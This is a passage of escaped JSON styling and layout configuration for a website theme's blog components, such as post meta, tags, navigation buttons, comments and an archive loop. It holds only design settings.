"v\":\"1.1\",\"nodes\":[\"432-m7\",\"31-m7\"],\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},{\"id\":77,\"type\":\"hop-post-meta\",\"nodeId\":\"26-m15\",\"v\":\"1.1\",\"nodes\":[\"432-m8\",\"31-m8\"],\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"display\":\"none\",\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":78,\"type\":\"hop-post-content\",\"nodeId\":\"23-m40\",\"v\":\"1.1\",\"nodes\":[\"432-m9\",\"31-m9\"],\"style\":{\"descendants\":{\"content\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"}}}}}}},{\"id\":79,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m10\",\"31-m10\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":80,\"type\":\"hop-column\",\"nodeId\":\"16-m38\",\"nodes\":[\"432-m11\",\"31-m11\"],\"v\":\"1.1\",\"props\":{\"verticalAlign\":\"center\"}},{\"id\":81,\"type\":\"hop-text\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m12\",\"31-m12\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":82,\"type\":\"hop-column\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m13\",\"31-m13\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"},\"props\":{\"verticalAlign\":\"center\"}},{\"id\":83,\"type\":\"hop-post-categories\",\"nodeId\":\"16-m37\",\"nodes\":[\"432-m14\",\"31-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}},\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}}},{\"id\":84,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"equalHeight\":false}},\"type\":\"hop-post-tags-container\",\"nodeId\":\"16-m30\",\"nodes\":[\"432-m15\",\"31-m15\"],\"v\":\"1.1\"},{\"id\":85,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m16\",\"31-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"verticalAlign\":\"center\"}},{\"id\":86,\"type\":\"hop-text\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m17\",\"31-m17\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"type\":\"normal\"}},{\"id\":87,\"type\":\"hop-column\",\"nodeId\":\"16-m32\",\"nodes\":[\"432-m18\",\"31-m18\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"vSpace\":{\"value\":23}},\"verticalAlign\":\"center\"}},{\"id\":88,\"type\":\"hop-post-tags\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m19\",\"31-m19\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"tagsLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"typography\":{\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"tagsPrefix\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}}}},{\"id\":89,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m20\",\"31-m20\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}}},{\"id\":90,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m21\",\"31-m21\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":91,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m48\",\"v\":\"1.1\",\"nodes\":[\"432-m22\",\"31-m22\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"left\":{\"style\":\"none\",\"color\":\"black\"},\"right\":{\"style\":\"none\",\"color\":\"black\"}},\"background\":{\"color\":\"\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"navigationTitle\":{\"maxWidth\":{\"value\":\"40\",\"unit\":\"ch\"}}}}},{\"id\":92,\"type\":\"hop-column\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m23\",\"31-m23\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":93,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m49\",\"v\":\"1.1\",\"nodes\":[\"432-m24\",\"31-m24\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}}},{\"id\":94,\"type\":\"hop-section\",\"nodeId\":\"16-m55\",\"nodes\":[\"432-m29\",\"31-m29\"],\"style\":{\"padding\":{\"top\":{\"value\":0},\"bottom\":{\"value\":0}}},\"v\":\"1.1\"},{\"id\":95,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m59\",\"nodes\":[\"432-m34\",\"31-m34\"],\"v\":\"1.1\"},{\"id\":96,\"type\":\"hop-column\",\"nodeId\":\"16-m60\",\"nodes\":[\"432-m35\",\"31-m35\"],\"v\":\"1.1\"},{\"id\":97,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m61\",\"nodes\":[\"432-m36\",\"31-m36\"],\"v\":\"1.1\"},{\"id\":98,\"type\":\"hop-text\",\"nodeId\":\"16-m62\",\"nodes\":[\"432-m37\",\"31-m37\"],\"v\":\"1.1\"},{\"id\":99,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"16-m56\",\"nodes\":[\"432-m30\",\"31-m30\"],\"v\":\"1.1\"},{\"id\":100,\"type\":\"hop-column\",\"nodeId\":\"16-m57\",\"nodes\":[\"432-m31\",\"31-m31\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"0\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"}},\"textAlign\":\"left\",\"media\":{\"tablet\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":101,\"type\":\"hop-post-comments\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m32\",\"31-m32\"],\"style\":{\"descendants\":{\"commentsTitle\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5}\",\"weight\":\"600\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"}}},\"commentInfo\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"transition\":{\"duration\":{\"value\":\"0.5\"}}},\"commentText\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"},\"a\":{\"states\":{\"hover\":{\"color\":\"${theme.colors.0|variant3}\"}}}}}},\"commentAuthorName\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\",\"style\":\"normal\",\"weight\":\"600\"},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"disabledComments\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\"}},\"comment\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentAvatar\":{\"width\":{\"value\":30},\"height\":{\"value\":30},\"background\":{\"color\":\"\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"commentsContainer\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"commentReply\":{\"typography\":{\"color\":\"${theme.colors.0}\",\"size\":{\"unit\":\"em\",\"value\":\"1\"},\"transform\":\"lowercase\",\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.5\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"alternateComment\":{\"background\":{\"color\":\"rgba(166, 220, 244, 0.1)\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentReplies\":{\"margin\":{\"left\":{\"value\":\"12\"}}},\"commentInfoContainer\":{\"typography\":{\"color\":\"${theme.colors.4|variant2}\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"16\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":102,\"type\":\"hop-post-comment-form\",\"nodeId\":\"23-m32\",\"v\":\"1.1\",\"nodes\":[\"432-m33\",\"31-m33\"],\"style\":{\"descendants\":{\"commentFormTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"},\"weight\":\"600\",\"family\":\"Open Sans\"}},\"commentFormLabels\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"commentFormButton\":{\"background\":{\"color\":\"${theme.colors.0}\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"24\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"24\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.4}\",\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"transform\":\"uppercase\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"1\"}}},\"commentFormInputs\":{\"border\":{\"top\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"typography\":{\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"color\":\"${theme.colors.5|variant2}\"},\"background\":{\"color\":\"rgba(0,0,0,0)\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"commentFormNotes\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":103,\"type\":\"hop-main\",\"nodeId\":\"68-m1\",\"v\":\"1.1\",\"nodes\":[\"435-m1\",\"34-m1\"],\"style\":{\"margin\":{\"top\":{\"value\":\"-30\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"-15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":104,\"type\":\"hop-section\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m2\",\"34-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}}},\"v\":\"1.1\"},{\"id\":105,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"19-m40\",\"nodes\":[\"435-m25\",\"34-m25\"],\"v\":\"1.1\"},{\"id\":106,\"type\":\"hop-column\",\"nodeId\":\"19-m41\",\"nodes\":[\"435-m26\",\"34-m26\"],\"v\":\"1.1\"},{\"id\":107,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"19-m42\",\"nodes\":[\"435-m27\",\"34-m27\"],\"v\":\"1.1\"},{\"id\":108,\"type\":\"hop-text\",\"nodeId\":\"19-m43\",\"nodes\":[\"435-m28\",\"34-m28\"],\"v\":\"1.1\"},{\"id\":109,\"type\":\"hop-archive-loop\",\"nodeId\":\"26-m6\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":2,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":2,\"verticalGap\":2}},\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":2}}},\"showMasonry\":true},\"v\":\"1.1\",\"nodes\":[\"435-m3\",\"34-m3\"]},{\"id\":110,\"type\":\"hop-loop-item\",\"nodeId\":\"26-m7\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(1, 51, 74, 0.15)\",\"spread\":\"0\",\"y\":\"10\",\"blur\":\"40\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m4\",\"34-m4\"],\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":111,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"26-m19\",\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}},\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"435-m5\",\"34-m5\"]},{\"id\":112,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3,\"horizontalGap\":3,\"verticalGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"mobile\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"type\":\"hop-row\",\"nodeId\":\"1726-m24\",\"v\":\"1.1\",\"nodes\":[\"435-m6\",\"34-m6\"],\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},{\"id\":113,\"type\":\"hop-column\",\"nodeId\":\"1726-m25\",\"style\":{\"textAlign\":\"left\",\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 